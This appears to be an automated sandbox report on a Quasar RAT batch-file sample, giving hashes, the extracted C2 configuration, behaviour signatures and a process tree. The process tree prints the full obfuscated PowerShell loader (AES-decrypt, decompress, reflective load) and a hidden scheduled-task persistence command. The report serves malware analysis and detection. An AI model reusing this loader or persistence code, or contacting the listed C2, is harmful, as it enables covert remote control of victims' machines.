quasar | 41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34

General

Target

video.bat
Size

1.8MB
MD5

3e23287bf7024e118f144018b5c6ee51
SHA1

e5c30a22a6b46400520809133e02ab824e6f1d8c
SHA256

41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34
SHA512

bd5644d745e159b56e67a9ff21390e9bfcbadd2b69530697dce6a8728af029c8d4d6712fe64975b8cde5fe574305b2a8c683c3f80602ec66d4f9a036a7e9fd06
SSDEEP

24576:nFqcE/6HOYP8eW5fvoUjBEcHvlstN2DzKlIBzmfvz/LKkROe5WkEsdov9eAvfGiA:nF0YPtAfv3qzym9ov9KJ

Score

10^/10

quasar phantom execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Phantom

C2

even-lemon.gl.at.ply.gg:33587

Mutex

db128a32-6a0f-4592-bc4d-39d508fbe456

Attributes

encryption_key
04017BC2FE671A38FED74363CF7D888C6B8DA217
install_name
$phantom-powershell.exe
log_directory
PHANTOM
reconnect_delay
3000
startup_key
$phantom-powershell
subdirectory
$phantom-phantom2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3116-114-0x000002827BD60000-0x000002827C084000-memory.dmp	family_quasar

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

2 3116 powershell.exe
6 3116 powershell.exe
8 3116 powershell.exe
13 3116 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

216 powershell.exe
3632 powershell.exe
3116 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2720 PING.EXE

flow	pid	process
2	3116	powershell.exe
6	3116	powershell.exe
8	3116	powershell.exe
13	3116	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	powershell.exe

pid	process
2720	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
216	powershell.exe
216	powershell.exe
216	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
3116	powershell.exe
3116	powershell.exe
3116	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	216	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeIncreaseQuotaPrivilege	3632	powershell.exe
Token: SeSecurityPrivilege	3632	powershell.exe
Token: SeTakeOwnershipPrivilege	3632	powershell.exe
Token: SeLoadDriverPrivilege	3632	powershell.exe
Token: SeSystemProfilePrivilege	3632	powershell.exe
Token: SeSystemtimePrivilege	3632	powershell.exe
Token: SeProfSingleProcessPrivilege	3632	powershell.exe
Token: SeIncBasePriorityPrivilege	3632	powershell.exe
Token: SeCreatePagefilePrivilege	3632	powershell.exe
Token: SeBackupPrivilege	3632	powershell.exe
Token: SeRestorePrivilege	3632	powershell.exe
Token: SeShutdownPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeSystemEnvironmentPrivilege	3632	powershell.exe
Token: SeRemoteShutdownPrivilege	3632	powershell.exe
Token: SeUndockPrivilege	3632	powershell.exe
Token: SeManageVolumePrivilege	3632	powershell.exe
Token: 33	3632	powershell.exe
Token: 34	3632	powershell.exe
Token: 35	3632	powershell.exe
Token: 36	3632	powershell.exe
Token: SeIncreaseQuotaPrivilege	3632	powershell.exe
Token: SeSecurityPrivilege	3632	powershell.exe
Token: SeTakeOwnershipPrivilege	3632	powershell.exe
Token: SeLoadDriverPrivilege	3632	powershell.exe
Token: SeSystemProfilePrivilege	3632	powershell.exe
Token: SeSystemtimePrivilege	3632	powershell.exe
Token: SeProfSingleProcessPrivilege	3632	powershell.exe
Token: SeIncBasePriorityPrivilege	3632	powershell.exe
Token: SeCreatePagefilePrivilege	3632	powershell.exe
Token: SeBackupPrivilege	3632	powershell.exe
Token: SeRestorePrivilege	3632	powershell.exe
Token: SeShutdownPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeSystemEnvironmentPrivilege	3632	powershell.exe
Token: SeRemoteShutdownPrivilege	3632	powershell.exe
Token: SeUndockPrivilege	3632	powershell.exe
Token: SeManageVolumePrivilege	3632	powershell.exe
Token: 33	3632	powershell.exe
Token: 34	3632	powershell.exe
Token: 35	3632	powershell.exe
Token: 36	3632	powershell.exe
Token: SeIncreaseQuotaPrivilege	3632	powershell.exe
Token: SeSecurityPrivilege	3632	powershell.exe
Token: SeTakeOwnershipPrivilege	3632	powershell.exe
Token: SeLoadDriverPrivilege	3632	powershell.exe
Token: SeSystemProfilePrivilege	3632	powershell.exe
Token: SeSystemtimePrivilege	3632	powershell.exe
Token: SeProfSingleProcessPrivilege	3632	powershell.exe
Token: SeIncBasePriorityPrivilege	3632	powershell.exe
Token: SeCreatePagefilePrivilege	3632	powershell.exe
Token: SeBackupPrivilege	3632	powershell.exe
Token: SeRestorePrivilege	3632	powershell.exe
Token: SeShutdownPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeSystemEnvironmentPrivilege	3632	powershell.exe
Token: SeRemoteShutdownPrivilege	3632	powershell.exe
Token: SeUndockPrivilege	3632	powershell.exe
Token: SeManageVolumePrivilege	3632	powershell.exe
Token: 33	3632	powershell.exe
Token: 34	3632	powershell.exe
Token: 35	3632	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

3116 powershell.exe

pid	process
3116	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 4384 wrote to memory of 216	4384	cmd.exe	powershell.exe
PID 4384 wrote to memory of 216	4384	cmd.exe	powershell.exe
PID 216 wrote to memory of 3632	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 3632	216	powershell.exe	powershell.exe
PID 216 wrote to memory of 4000	216	powershell.exe	WScript.exe
PID 216 wrote to memory of 4000	216	powershell.exe	WScript.exe
PID 4000 wrote to memory of 3736	4000	WScript.exe	cmd.exe
PID 4000 wrote to memory of 3736	4000	WScript.exe	cmd.exe
PID 3736 wrote to memory of 3116	3736	cmd.exe	powershell.exe
PID 3736 wrote to memory of 3116	3736	cmd.exe	powershell.exe
PID 3116 wrote to memory of 4756	3116	powershell.exe	cmd.exe
PID 3116 wrote to memory of 4756	3116	powershell.exe	cmd.exe
PID 4756 wrote to memory of 4856	4756	cmd.exe	chcp.com
PID 4756 wrote to memory of 4856	4756	cmd.exe	chcp.com
PID 4756 wrote to memory of 2720	4756	cmd.exe	PING.EXE
PID 4756 wrote to memory of 2720	4756	cmd.exe	PING.EXE

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\video.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gX7XYLn4dbQdiIUvmYqk2d03PgJBXfcZvi3WFTZZa4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KcZLFz/4shTUK5TFlUW+3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fzajp=New-Object System.IO.MemoryStream(,$param_var); $FzQYM=New-Object System.IO.MemoryStream; $HukBb=New-Object System.IO.Compression.GZipStream($fzajp, [IO.Compression.CompressionMode]::Decompress); $HukBb.CopyTo($FzQYM); $HukBb.Dispose(); $fzajp.Dispose(); $FzQYM.Dispose(); $FzQYM.ToArray();}function execute_function($param_var,$param2_var){ $iMwpu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iFQms=$iMwpu.EntryPoint; $iFQms.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\video.bat';$pGsGT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\video.bat').Split([Environment]::NewLine);foreach ($yaYpE in $pGsGT) { if ($yaYpE.StartsWith(':: ')) { $glRAZ=$yaYpE.Substring(3); break; }}$payloads_var=[string[]]$glRAZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_416_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_416.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_416.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:4000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_416.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gX7XYLn4dbQdiIUvmYqk2d03PgJBXfcZvi3WFTZZa4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KcZLFz/4shTUK5TFlUW+3w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fzajp=New-Object System.IO.MemoryStream(,$param_var); $FzQYM=New-Object System.IO.MemoryStream; $HukBb=New-Object System.IO.Compression.GZipStream($fzajp, [IO.Compression.CompressionMode]::Decompress); $HukBb.CopyTo($FzQYM); $HukBb.Dispose(); $fzajp.Dispose(); $FzQYM.Dispose(); $FzQYM.ToArray();}function execute_function($param_var,$param2_var){ $iMwpu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iFQms=$iMwpu.EntryPoint; $iFQms.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_416.bat';$pGsGT=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_416.bat').Split([Environment]::NewLine);foreach ($yaYpE in $pGsGT) { if ($yaYpE.StartsWith(':: ')) { $glRAZ=$yaYpE.Substring(3); break; }}$payloads_var=[string[]]$glRAZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5xZUZk4pfyBl.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:4756

C:\Windows\system32\chcp.com
chcp 65001
7⤵
PID:4856

C:\Windows\system32\PING.EXE
ping -n 10 localhost
7⤵
- Runs ping.exe
PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
25d137cd6006be2670e343e81b402475

SHA1
5304d9bc748576d60e055a1d6ec307dddd54e0ac

SHA256
8f1e6f7a898f01db7d98f426a30d5f0834bf536acba82752aa017eb11db4fd43

SHA512
63c09d3ce8b86fb1401981a53cf53e229fe2014c285c5b261917029f3502ddc25f22093b84907d1b25f354244caf94aa82bfb113b10a29b7d623c731290eb1b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\5xZUZk4pfyBl.bat

Filesize
220B

MD5
ad4a890ff183395b7bb010b82f6db14b

SHA1
49fd2bf37bf6da81d9053cfebc8051e1d3b499cc

SHA256
0da917b29ad0e2d4dea4d53ee4f4fdd71d2dd61c155c9ce89c915d12af85cfe2

SHA512
642445a5c50ad6101d287d634de3ee734122307bc912db8ac3e333e57bcbc67b54aa0121b8147dfa16ef28b2fe25e5c4d9e6c5e05502ffdac237eaac06dc4835

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_osreqpbv.xcc.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_416.bat

Filesize
1.8MB

MD5
3e23287bf7024e118f144018b5c6ee51

SHA1
e5c30a22a6b46400520809133e02ab824e6f1d8c

SHA256
41216ba83eddf1b01197fb44abbb24e8a83389862a843e6c78ae6a0f9474be34

SHA512
bd5644d745e159b56e67a9ff21390e9bfcbadd2b69530697dce6a8728af029c8d4d6712fe64975b8cde5fe574305b2a8c683c3f80602ec66d4f9a036a7e9fd06

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_416.vbs

Filesize
115B

MD5
695028df0575a3c6a66f9484a65f2bfd

SHA1
d659ecad86847edd81884a60528c86829a5ebb74

SHA256
919e1ecd734237edc9b4e2a2cea67b7c279636b249506d408bf10c28ca536c8b

SHA512
e6551cf5bc8ab6d8b0a25d8a145dca2699cf310ad168dc7d3542e291103333dfa17a67283122209e5b04efc926ca1970005d22561e897ecffd3a1bee95e8427e

Download Submit
memory/216-11-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/216-28-0x000001FA6C0B0000-0x000001FA6C0B8000-memory.dmp

Filesize
32KB

Download
memory/216-29-0x000001FA6C610000-0x000001FA6C768000-memory.dmp

Filesize
1.3MB

Download
memory/216-27-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/216-121-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/216-3-0x00007FF95A543000-0x00007FF95A544000-memory.dmp

Filesize
4KB

Download
memory/216-12-0x000001FA6C390000-0x000001FA6C406000-memory.dmp

Filesize
472KB

Download
memory/216-10-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/216-5-0x000001FA6C0C0000-0x000001FA6C0E2000-memory.dmp

Filesize
136KB

Download
memory/3116-116-0x000002827C590000-0x000002827C5E0000-memory.dmp

Filesize
320KB

Download
memory/3116-114-0x000002827BD60000-0x000002827C084000-memory.dmp

Filesize
3.1MB

Download
memory/3116-117-0x000002827C6A0000-0x000002827C752000-memory.dmp

Filesize
712KB

Download
memory/3116-118-0x000002827C930000-0x000002827CAF2000-memory.dmp

Filesize
1.8MB

Download
memory/3116-124-0x000002827C560000-0x000002827C572000-memory.dmp

Filesize
72KB

Download
memory/3116-125-0x000002827C620000-0x000002827C65E000-memory.dmp

Filesize
248KB

Download
memory/3632-76-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3632-55-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3632-44-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download
memory/3632-42-0x00007FF95A540000-0x00007FF95AF2C000-memory.dmp

Filesize
9.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads